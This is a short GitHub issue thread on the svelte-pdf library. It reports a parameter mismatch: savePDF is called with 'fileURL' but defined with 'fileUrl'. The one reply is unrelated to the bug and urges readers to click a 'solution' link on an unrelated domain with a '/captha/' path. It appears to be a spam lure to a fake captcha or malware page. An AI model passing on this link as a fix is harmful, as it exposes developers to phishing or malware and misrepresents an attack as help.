### ISSUE TITLE
download error

### ISSUE THREAD

**Issue by sucls** [vinodnimbalkar/svelte-pdf#91]
in use
`
savePDF({ fileURL, data, name: fileName });
`

But defining
`
export const savePDF = async ({ fileUrl, data, name = "download.pdf" })
`

fileURL fileUrl is inconsistent

**Comment by Malove98** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.
